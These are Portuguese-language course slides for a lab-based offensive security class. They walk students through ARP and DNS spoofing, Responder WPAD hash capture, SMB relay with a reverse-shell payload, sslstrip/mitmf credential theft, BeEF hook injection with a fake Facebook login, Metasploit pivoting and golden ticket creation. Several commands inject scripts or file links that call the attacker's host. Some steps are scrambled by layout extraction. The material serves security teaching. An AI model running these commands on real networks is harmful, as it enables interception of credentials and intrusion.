and DNS. This protocol was introduced in Windows Vista, it is used to resolves single label names.The main
differences are:- LLMNR supports IPv6.- LLMNR is Multicast.LLMNR is used when DNS name resolution is unable to
identify a host. If LLMNR fail, NBT-NS will be used as last resort if enabled.
Se estivermos na mesma rede de boradcast do cliente que tentar resolver o nome do host "WPAD", podemos criar
um serviço que responderá a requisição e até mesmo possuir o arquivo wpad.dat em um servidor http que requer
uma autenticação básica, que não tenta fazer uma reengenharia na autenticação.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Efeitos e impactos
Atualização de Cookie
Sniffing
binários inserção/roubo
Implantação de
Envenenamento Sequestro de
certificados
de Cache Sessões
falsos
Ataques de Implantação de
Downgrade Malwares
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – O que eu consigo
Ou, simplesmente
redirecionamento
Roubo e ou quebra de ( Resultando em download de
credenciais softwares maliciosos,
exploração do browser entre
outras coisas.)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Ferramentas
responder mitmf
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Exploração
• Monitoro o tráfego e coleto informações (usuários, senhas e outras informações que julgar necessário)
03
• Modifico pacotes e insiro informações que preciso (downgrade de protocolos, hook de browser)
04
• Crio persistência
05
• Exploro
06
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Quando usar?
Iníco da fase de
Durante a
exploração (ideal
movimentação
para obter
lateral
usuários e senhas)
entre os
SMB RELAY
administradores
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 26 – ARP Cache Poisoning
(arpspoof)
1 – No host1 abra o prompt de comando e execute um ping no endereço ip do host2
ping 10.0.0.102
2 – No host1 verifique na tabela ARP o endereço mac do default gateway. Anote este endereço.
arp -a
3 – No host2 verifique na tabela ARP o endereço mac do host1. Anote este endereço.
arp –a
4 – No host2 verifique na tabela ARP o endereço mac do host1. Anote este endereço.
arp -a
5 – Em sua distribuição LINUX realize um arp spoof entre os hosts 1 e o roteador de internet (default gateway)
arpspoof -i eth0 -t IP_ROTEADOR -r IP_WINDOWS
-i (interface)
-t (target)
-r (host)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 26 – ARP Cache Poisoning
(arpspoof)
6 – No host1 verifique na tabela ARP o endereço mac do roteador. O que está diferente?
arp -a
7 – No host2 verifique na tabela ARP o endereço mac do host1. O que está diferente?
arp –a
8 – Ative o roteamento em sua distribuição Linux. É necessário ativar o roteamento para que a comunicação entre o host1 e o host2 se
mantenham ativa.
echo 1 > /proc/sys/net/ipv4/ip_forward
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 27 – ICMP Redirect
(ettercap)
5 – Através do host1 acesse o serviço de ftp indicado e insira qualquer usuário e senha.
ftp ftp.microsoft.com
usuário: anonymous
senha:teste
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 27 – ICMP Redirect
(ettercap)
6 – Verifique a tela do ettercap, e note que o usuário e senha do ftp foi caputurado.
7 – Abra o shell (cmd) do host 1 e verifique a tabela arp. Houve alguma mudança?
arp -a
11 – Acesse alguns sites na Internet através do host. Pelo urlsnar será possível ver em detalhes as urls acessadas e pelo drifinet as imagens
das urls. Quando você navega em sites https existe o monitoramento da conexão? Porque?
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 28 – DNS Spoof
(ettercap)
################################
# Facebook
*.facebook.com A 10.0.0.200
#################################
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 28 – DNS Spoof
(ettercap)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 29 – WPAD
(responder)
1 – Abra o shell (terminal) de sua distribuição linux e ativar o responder.
responder -I eth0 -wrfF
-I – interface
-w – Ativar o proxy server WPAD
-f – Obter um fingerprint de um host que gerou uma query NBT-NS ou LLMNR
-F – Força a autenticação NTLM/Basic . Será exibido um prompt de login.
--lm – Força um downgrading para o LM hashing em Windows XP/2003 ou anteriores.
--basic – Retorna a autenticação HTTP básica.
2 – Abra o Internet Explorer e comece a navegar na Internet até que os hashes sejam capturados. Os hashes serão exibidos na tela do
Responder.
5 – Abra o Internet Explorer e comece a navegar na Internet até que os hashes sejam capturados. Os hashes ou senhas em texto puro serão
exibidos na tela do Responder. Se você obtive os hashes, qual a diferença entre os hashes obtidos agora para os hashes obtidos nos
exerçicios anteriores?
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 29 – WPAD
(responder)
6 – Para melhorar a captura de hashes, siga os procedimentos abaixo:
B – Na sessão [HTTP Server] as opções a seguir devem estar configuradas como demonstrado a seguir:
Serve-Always = Off;
Serve-Exe = Off;
Serve-Html = Off
HTMLToInject = <img src='file://10.0.0.200/pictures/logo.jpg' alt='Loading' height='1' width='1'> (Substituir o IP 10.0.0.200 pelo seu
endereço IP).
7 – Abra o Internet Explorer e comece a navegar na Internet até que os hashes sejam capturados. Os hashes serão exibidos na tela do
Responder, mas agora a cada página navegada o Responder injectará um código que fará com que o alvo acesse um copartilhamento de
arquivos em sua distribuição LINUX para que os hashes sejam capturados.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 30 – SMB RELAY
(responder)
3 – Crie um payload de shell reverso https usando o VEIL ou o método que preferir e ative o multi handler de acordo com o seu payload.
4 – Ative o SMBRELAY apontando para o seu payload criado e para o host1, que será o alvo.
smbrelayx.py -e /root/veil-output/compiled/payload.exe -h 10.0.0010
(fazer o injections no codigo html para que este acesso seja realizado dentro do MITMF)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 30 – SMB RELAY
(responder)
6 – Cancele o SMBRELAY atual e aponte-o para o servidor de arquivos, matendo o mesmo payload e o multhandler aberto.
smbrelayx.py -e /root/veil-output/compiled/payload.exe -h 10.0.0010
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 31 – HTTPS (old way)
2 - Configurar NAT
a - verificar a existencia de NATS
iptables -t nat –L
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 31 – HTTPS (old way)
2 - Executo o sslstrip
sslstrip -l 6666 ou
sslstrip -l 6666 –f (O que o –f faz?)
3 - Ativar o ettercap
3 – Abrir sites com usuário e senha como gmail, facebook e outros na máquina virtual Windows e verificar se as senhas são
capturadas.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 32 – HTTPS (HSTS)
Não será necessário configurar o roteamento e NAT. O mitmf fará tudo isso automaticamente.
3 – Abra o shell (cmd) do host 1 e verifique a tabela arp. Se a tabela arp mudou o MITM funcionou.
arp -a
4 – Navege a Internet e acesse sites como GMAIL e FACEBOOK. Tente realizar a autenticação mesmo utilizando usuários
inválidos e confirme se os usuários e senhas são capturados pelo mitmf.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 33 – BEEF
1 – Instalar o Twisted ou o Inject não funciona
cd /tmp
wget https://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
tar -xvf Twisted-15.5.0.tar.bz2
cd Twisted-15.5.0/
./setup.py install
2 – Executar o Beef
cd /usr/share/beef-xss
./beef
3 – Executar o MiTM
mitmf -i eth0 --spoof --arp --gateway 172.16.254.2 --target 172.16.254.138 --hsts --inject --js-url http://10.0.0.200:3000/hook.js
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 33 – BEEF
10 – Usando o Pretty Theft, dentro da pasta de Social Engineering do Beef, envie uma tela de autenticação falsa do FACEBOOK para o alvo clicando
no botão execute.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 34 – All in One
1 – Realizar:
• Arp poisoning para iniciar o MiTM;
• Monitoramento de HTTPS com SSL Strip +;
• Ativar o responder com WPAD e monitoramento de protocolos;
• Realizar o injection o hook do BEEF em todos os usuários que navegarem na Internet;
• Obter os hashes netntlmv2 dos usuários que navegam na Internet através da injeção de uma url.
mitmf -i eth0 --spoof --arp --gateway 10.0.0.2 --target 10.0.0.101 --hsts --responder --wredir --nbtns --wpad --forcewpadauth --inject --js-url
http://10.0.0.139:3000/hook.js --html-payload "<img src='file://10.0.0.139/pictures/logo.jpg' alt='Loading' height='1' width='1'>”
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Laboratório
Configuração
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Laboratório - Configuração
Para que possua uma boa experiência durante os exercícios, utilize a configuração demonstrada na figura a seguir.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Movimentação Lateral
Pivoting
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
35 - Movimentação Lateral - Metasploit
1 - Realizar a invasão com o ICECAST na máquina 1 5 - Instalar o proxychains
apt-get install proxychains
2 - Realizar o mapeamento dos hosts locais
Dentro do meterpreter 6 - Verificar se a porta de socks do proxychains é a 9050
Ifconfig (veja as outras interfaces) cat /etc/proxychains.conf
run arp_scanner -r 10.1.1.0/24
7 – No SHELL do Linux realizar nmap nos alvos descobertos
3 - Ativar o roteamento para o alvo proxychains nmap -sT –sV <ip dos alvos>
Fora do meterpreter, mas dentro do msfconsole
route add 10.1.1.1 255.255.255.0 <número da sessão de invasão> 8 – Relizar a invasão no ICECAST da máquina 2 (10.1.1.30)
route print
DESAFIOS
ou dentro do meterpreter 9 – Acessar o remote desktop do máquina 2 pelo shell
run autoroute -s 10.1.1.1/24 do seu LINUX.
run autoroute -p proxychains rdesktop <ip> ou usar o portfwd no meterpreter.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Active Directory
Exploração
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
36 - Active Directory Golden Ticket
1 – Obter os hashes do usuário krbtg do controlador do domínio.
Hash da senha da conta krbtgt do controlador de domínio (usarei somente a segunda metade do hash)
4 – Realizar o upload do mimikatz para o computador alvo que não está no domínio.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
36 - Active Directory Golden Ticket
METASPLOIT
use kiwi
kerberos_ticket_list
kerberos_ticket_purge
golden_ticket_create -u Administrator -d Foundation -s S-1-5-21-1883305224-1889578860-2307555304 -k
744bc3cc86ef41967df1a84b1fe4912e -t Administrator.ticket
kerberos_ticket_use Administrator.ticket
kerberos_ticket_listgolden_ticket_create -u Jiraya -d Foundation -s S-1-5-21-1883305224-1889578860-2307555304 -k
744bc3cc86ef41967df1a84b1fe4912e -g 501,502,512,513,520,518,519 -t Jiraya.ticket
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
37 – Estudo de caso
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS